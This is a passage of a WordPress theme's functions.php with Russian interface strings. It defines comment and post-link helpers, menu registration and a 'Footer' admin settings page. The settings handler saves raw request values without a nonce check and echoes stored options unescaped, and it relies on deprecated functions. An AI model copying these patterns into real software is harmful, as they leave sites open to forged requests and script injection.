                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
